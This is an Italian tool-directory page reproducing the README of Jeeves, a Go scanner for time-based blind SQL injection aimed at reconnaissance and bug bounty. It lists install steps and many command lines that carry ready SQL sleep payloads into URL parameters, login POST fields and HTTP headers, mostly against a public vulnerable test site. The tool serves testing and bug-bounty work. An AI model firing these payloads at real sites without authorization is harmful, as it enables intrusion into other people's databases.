Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Jeeves — Strumento di rilevamento di SQL injection blind basato sul tempo per ricognizione e bug bounty. Accetta URL singoli o liste, supporta header personalizzati, proxy e dati POST per la scansione automatizzata delle vulnerabilità. | Kitploit
Strumenti/GitHubGitHub/ferreiraklet/jeeves
Scanner di VulnerabilitàSicurezza WebPenetration Testing
GitHubferreiraklet/jeeves

Jeeves

Strumento di rilevamento di SQL injection blind basato sul tempo per ricognizione e bug bounty. Accetta URL singoli o liste, supporta header personalizzati, proxy e dati POST per la scansione automatizzata delle vulnerabilità.

Vedi Repository
21550444 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

made-with-Go

Jeeves


Utilizzo • Installazione

Jeeves è progettato per cercare SQL Injection Blind basate sul tempo durante la fase di ricognizione.

Contenuti:

  • Installazione
  • Utilizzo
    • Aggiungere Headers
    • Usare Proxy
    • Effettuare Richieste POST
    • Altri modi di utilizzo

- Installazione e Requisiti:

Installare Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

OPPURE

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- Utilizzo e Spiegazione:

Nel tuo processo di ricognizione, potresti trovare endpoint che possono essere vulnerabili a SQL injection, Es: https://redacted.com/index.php?id=1

URL singoli

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

In --payload-time devi usare il tempo menzionato nel payload


Da lista

cat targets | jeeves --payload-time 5

Aggiungere Headers

Presta attenzione alla sintassi! Deve essere uguale =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

Usare proxy

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

Proxy + Headers =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

Richiesta POST

Invio dati tramite richiesta POST (moduli di login, ecc.)

Presta attenzione alla sintassi! Deve essere uguale! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

Altri modi di utilizzo

Puoi usare Jeeves con altri strumenti, come gau, gauplus, waybackurls, qsreplace e bhedak, sfruttando al meglio la sua potenza.


Opzioni della riga di comando:

root@kitploit:~
 Usage:
 -t, --payload-time,  The time from payload
 -p, --proxy          Send traffic to a proxy
 -c                   Set Concurrency, Default 25
 -H, --headers        Custom Headers
 -d, --data           Sending Post request with data
 -h                   Show This Help Message

Utilizzo con wordlist di payload SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

Test negli headers

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2)),0)OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2)),0)OR'" -t 10

Payload credit: https://github.com/rohit0x5

Oss:

  • Non segue i reindirizzamenti. Se il codice di stato è diverso da 200, restituisce "Need Manual Analisys"
  • Jeeves non esegue http probing, non è in grado di fare richieste a URL che non contengono protocollo ( http://, https:// )

Questo progetto è solo per scopi educativi e bug bounty! Non supporto alcuna attività illegale!.

Se c'è qualche errore nel programma, contattami immediatamente.

Per favore, controlla anche questi =>

Nilo - Controlla se l'URL ha stato 200

SQLMAP

Blisqy - SQLI basata sul tempo negli headers

Scarica lo strumento